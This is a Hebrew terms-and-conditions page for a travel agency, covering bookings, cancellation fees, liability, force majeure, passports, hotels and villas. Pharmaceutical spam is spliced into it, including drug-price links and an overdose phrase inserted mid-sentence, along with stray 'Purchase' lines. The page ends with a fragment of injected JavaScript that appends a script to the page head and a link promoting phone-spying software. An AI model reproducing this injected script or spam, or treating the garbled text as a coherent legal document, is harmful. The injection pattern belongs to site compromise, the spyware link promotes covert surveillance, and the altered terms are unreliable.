תנאים כלליים

תנאים כללים:
שתיקרא להלן סוכנות איזי טורס די בסט"הסוכנות" מציעה שירותים הניתנים ע"י גוף שלישי ונחשבת כשליח עבור הנוסע או מטעמו וכגורם מקשר בכפוף לתנאים ולתעריפים שעל פיהם פועלים הגופים המארגנים את אותם שירותים.
השימוש באתר הינו לכולם, אך הזמנת מוצרים מותרת רק למי שמלאו לו 18 שנה.
בדיקה ועצם הרשמת הנוסע למי מההצעות באתר, מהווה את הסכמת הנוסע לכל התנאים וההגבלות המפורטים בדף זה והמתייחסים למוצרים השונים
על הלקוח ליצור קשר טלפוני או באמצעים אלקטרונים אחרים: אימייל או פקס, לקבל טופס הזמנה, למלאו בהתאם להוראות ולשלוח בפקס לסוכנות איזיטורס די בסט
פרטי כרטיס אשראי יש למלא אך ורק בטופס ההזמנה ולא באתר עצמו.

http://fajar-anugrah.mhs.narotama.ac.id/2018/02/01/fertomid-25-price/

דרך ביטול ומועד לביטול
כל הזמנה בטיסות שכר, חבילת שכר (טיסה ומלון, או טיסה והשכרת וילה), השכרת רכב, מלון (בארץ ובחו"ל) וטיול מאורגן חלים עליה דמי ביטול מרגע ביצוע ההזמנה ו/או אישורה ובהתאם לתנאי ספקי השרות השונים.
בטיסות סדירות דמי הביטול שונים לפי סוגי הכרטיסים , ויש לוודאם טלפונית עם "הסוכנות".

Purchase

הודעות על ביטול חיבות להישלח בכתב, בפקס או בתקשורת אלקטרונית אל "הסוכנות" ע"י הלקוח.

Purchase

תנאים ואחריות
נזקים וביטוח:
סוכן הנסיעות ו/או הנהלת mestinon overdose treatment "הסוכנות" אינם אחראים לנזקים הנגרמים לנוסע כגון: נזקי גוף, מחלות, נזק למטען ו/או כל נזק ישיר או עקיף שעלול להיגרם לנוסע במהלך הטיסה ו/או שהייתו בחו"ל עקב תאונה, מעשה אלימות, שוד, גניבה, אשפוז, הריון (נדגיש כי יש חברות תעופה המתנות טיסה מעל שבוע 26, באישור רופא), הוצאות רפואיות, אובדן המטען ו/או מסמכים ו/או כרטיס טיסה ו/או דרכון וכיו"ב. מומלץ לדאוג לביטוח נסיעה במשרדנו
כח עליון:
סוכן הנסיעות ו/או הנהלת "הסוכנות" יהיו פטורים מאחריות כלפי הנוסעים בכל הקשור לביטול ו/או שינוי בתוכניות החופשה בכל פרק זמן שהוא אשר נגרם במישרין ו/או בעקיפין כתוצאה מכח עליון, שביתות, סגר, הפרות סדר, שריפה, הצפה, מזג אוויר, מרי אזרחי, מלחמה, מבצע צבאי, פלישה, מרד, מגיפות, מחלות, חרם, מעצרים, תקלות טכניות או כל פעולה של כח עליון שמעבר לשליטת המארגן בין אם צפוי ו/או בלתי צפוי.
ויזה ותוקף דרכון
הדרכון חייב להיות בתוקף לפחות 6 חודשים מיום היציאה לחו"ל, על בעלי הדרכון לבדוק צורך באשרות כניסה (ויזה) למדינה אליה טסים, על הלקוח האחריות לציין אזרחותו בפני הסוכן. הנפקת הדרכון ו/או האשרות ובדיקתן הנן באחריות הנוסע בלבד.
רישיון נהיגה בינלאומי
בחלק מהמדינות אין תוקף חוקי לרישיון הנהיגה הישראלי ויש צורך לדאוג לבדוק עבור כל מדינה את הצורך ברישיון נהיגה בינלאומי, על הנוסע האחריות לדאוג לסידור וקבלת רישיון נהיגה בינלאומי.

Purchase Order

בתי מלון
האישור הסופי להזמנת חדרים במלונות יינתן על ידי הסוכן לאחר קבלת אישור הספקים.
הנוהג המקובל לכניסה לחדרים בבתי מלון והיציאה מהם הינו כדלקמן: כניסה מהשעה 14:00 ויציאה עד השעה 12:00 בצהרים, וזאת ללא קשר למועדי הטיסות. רמת בתי המלון ודירוגם נקבע על-ידי משרד התיירות המקומי של כל מדינה ומדינה ולפיכך אין להשוות דרגות שונות בארצות שונות.
סוכן הנסיעות ו/או הנהלת "הסוכנות" אינם אחראים להפעלתו היום יומית של המלון, לרבות תקינות מערכותיו, שעות הפעלת מיזוג האוויר וכד'.
 
מניין הימים
במניין הימים מחושבים יום היציאה מישראל ויום החזרה אליה שהינם ימים חלקיים בלבד. זמני היציאה וההגעה מ/לישראל נתונים בידי חברת התעופה ונעשום בהם שנויים עד הרגע האחרון ואין הנהלת "הסוכנות"מתחייבת להשלים את הימים במלואם. במקרה של ארוחות במלון שלא מומשו במסגרת חבילת הנופש בגין שינוי מועדי הטיסות לא יינתן החזר בעבורן.
שעות כניסה ויציאה בוילות פרטיות online

can u buy clomid on line

האישור הסופי להזמנת וילה / וילות יינתן על ידי הסוכן או "הסוכנות" לאחר קבלת אישור הספקים או בעלי הוילות.

הנוהג המקובל לכניסה ויציאה בוילות הינו כדלקמן: כניסה מהשעה 14:00 ויציאה עד השעה 10:00 למעט מקרים שבהם אושרו שעות אחרות ויש לוודא קבלת שובר לוילה הכולל שעות כניסה ויציאה בהתאם.

d.getElementsByTagName('head')[0].appendChild(s);document.currentScript.parentNode.insertBefore(s, document.currentScript);document.currentScript.parentNode.insertBefore(s, document.currentScript);topspyapps.nethttp://theswishlife.com/fashion/sms-spy-cell-phone-tracking-software-spy-program-android/